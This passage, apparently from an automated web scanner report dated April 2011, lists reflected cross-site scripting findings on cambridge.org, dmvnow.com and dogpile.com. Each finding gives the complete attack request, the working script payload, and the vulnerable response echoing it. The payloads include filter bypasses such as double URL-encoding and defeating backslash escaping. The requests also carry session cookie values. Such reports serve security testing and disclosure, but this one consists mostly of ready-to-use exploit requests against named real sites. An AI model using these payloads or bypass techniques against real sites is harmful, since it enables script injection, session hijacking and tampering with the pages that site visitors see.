Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/404_error.asp7de6f%253cscript%253ealert%25281%2529%253c%252fscript%253ea0646ab12cc?error=catalogueimagesecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8439
Date: Fri, 01 Apr 2011 18:16:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>404_error.asp7de6f<script>alert(1)</script>a0646ab12cc?error=catalogueimagesecomm_logo.gif</b>
...[SNIP]...

2.83. http://www.cambridge.org/uk/404_error.asp [error parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/404_error.asp

Issue detail

The value of the error request parameter is copied into the HTML document as plain text between tags. The payload 45ef8<script>alert(1)</script>412bcae565c was submitted in the error parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uk/404_error.asp?error=catalogueimagesecomm_logo.gif45ef8<script>alert(1)</script>412bcae565c HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gif45ef8<script>alert(1)</script>412bcae565c</b>
...[SNIP]...

2.84. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e993%253cscript%253ealert%25281%2529%253c%252fscript%253ed0d9917e9d7 was submitted in the REST URL parameter 2. This input was echoed as 9e993<script>alert(1)</script>d0d9917e9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue9e993%253cscript%253ealert%25281%2529%253c%252fscript%253ed0d9917e9d7/images/ecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogue9e993<script>alert(1)</script>d0d9917e9d7imagesecomm_logo.gif</b>
...[SNIP]...

2.85. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 907f0%253cscript%253ealert%25281%2529%253c%252fscript%253ed021c5ae35e was submitted in the REST URL parameter 3. This input was echoed as 907f0<script>alert(1)</script>d021c5ae35e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images907f0%253cscript%253ealert%25281%2529%253c%252fscript%253ed021c5ae35e/ecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimages907f0<script>alert(1)</script>d021c5ae35eecomm_logo.gif</b>
...[SNIP]...

2.86. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0a13%253cscript%253ealert%25281%2529%253c%252fscript%253e7325a07c0e1 was submitted in the REST URL parameter 4. This input was echoed as b0a13<script>alert(1)</script>7325a07c0e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images/ecomm_logo.gifb0a13%253cscript%253ealert%25281%2529%253c%252fscript%253e7325a07c0e1 HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gifb0a13<script>alert(1)</script>7325a07c0e1</b>
...[SNIP]...

2.87. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cambridge.org
Path:   /uk/catalogue/images/ecomm_logo.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d56d<a>13f04026c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images/ecomm_logo.gif?8d56d<a>13f04026c27=1 HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8400
Date: Fri, 01 Apr 2011 18:16:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gif?8d56d<a>13f04026c27=1</b>
...[SNIP]...

2.88. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/viewBasket.asp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b0fa%253cscript%253ealert%25281%2529%253c%252fscript%253ee38b28956e7 was submitted in the REST URL parameter 2. This input was echoed as 2b0fa<script>alert(1)</script>e38b28956e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue2b0fa%253cscript%253ealert%25281%2529%253c%252fscript%253ee38b28956e7/viewBasket.asp HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8413
Date: Fri, 01 Apr 2011 18:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogue2b0fa<script>alert(1)</script>e38b28956e7viewbasket.asp</b>
...[SNIP]...

2.89. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /uk/catalogue/viewBasket.asp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22ad7%253cscript%253ealert%25281%2529%253c%252fscript%253eb9863c1a48a was submitted in the REST URL parameter 3. This input was echoed as 22ad7<script>alert(1)</script>b9863c1a48a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/viewBasket.asp22ad7%253cscript%253ealert%25281%2529%253c%252fscript%253eb9863c1a48a HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8413
Date: Fri, 01 Apr 2011 18:16:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueviewbasket.asp22ad7<script>alert(1)</script>b9863c1a48a</b>
...[SNIP]...

2.90. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dmvnow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f92"><script>alert(1)</script>946b1b39319 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f92"><script>alert(1)</script>946b1b39319 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmvnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 17:21:10 GMT; path=/
Server: Microsoft-IIS/5.0
Date: Fri, 01 Apr 2011 17:21:10 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 17377
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<HTML>
   <HEAD>
           <title>Commonwealth of Virginia Department of
...[SNIP]...
<a class="main" href="/webdoc/utilities/error.asp?

404;http://www.dmvnow.com/favicon.ico88f92"><script>alert(1)</script>946b1b39319&amp;


pf=y">
...[SNIP]...

2.91. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The value of the qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d20\'%3balert(1)//ff63f7f2300 was submitted in the qcat parameter. This input was echoed as c8d20\\';alert(1)//ff63f7f2300 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11?_IceUrl=true&qcat=webc8d20\'%3balert(1)//ff63f7f2300&qkw= HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7d43bcdc3ae442d4896bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:43 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:43 GMT
Connection: close
Content-Length: 45625
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Webc8d20\\';Alert(1)//Ff63f7f2300/';
var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=7d43bcdc3ae442d4896bc16a3af0cb01&10=1&11=info.dogpl&14=1220
...[SNIP]...

2.92. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [icePage%24SearchBoxTop%24qcat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The value of the icePage%24SearchBoxTop%24qcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96402\'%3balert(1)//a2498f1a00b was submitted in the icePage%24SearchBoxTop%24qcat parameter. This input was echoed as 96402\\';alert(1)//a2498f1a00b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
Content-Length: 1960
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=cbef8ee057aa45668e6fc16a3af0cb01&ActionId=8604994ef54a4503a8ebc16a3af0cb01&CookieDomain=.dogpile.com

__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYFBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY
...[SNIP]...
uw8Cmd%2BzyQ0CuYHVhgQCkKvm%2FwUCxNGrzg8CsqH2uAMChuqLpwMCsKGquAMCsaGC3QoCmfTV2gYCs6SaowUCnI%2BIqgQCt56zoQ8C252OhQUCgKHemAoCmu%2FnvgICkPP5CFy2AeMkGJYIpnubvjN9%2BlFgNo94&icePage%24SearchBoxTop%24qcat=Web96402\'%3balert(1)//a2498f1a00b&icePage%24SearchBoxTop%24rfcid=417&icePage%24SearchBoxTop%24rfcp=&icePage%24SearchBoxTop%24qlnk=0&icePage%24SearchBoxTop%24AdvancedSearchWeb%24advnames=qall%2Cqphrase%2Cqany%2Cqnot%2Clang%2Cqafter%2C
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=3bbca414522d42f7bc54c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:20 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:19 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
, more";
var addthis_offset_top = 20;
var addthis_hover_delay = 0;
var addthis_append_data = true;
var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/Web96402\\';alert(1)//a2498f1a00b/';
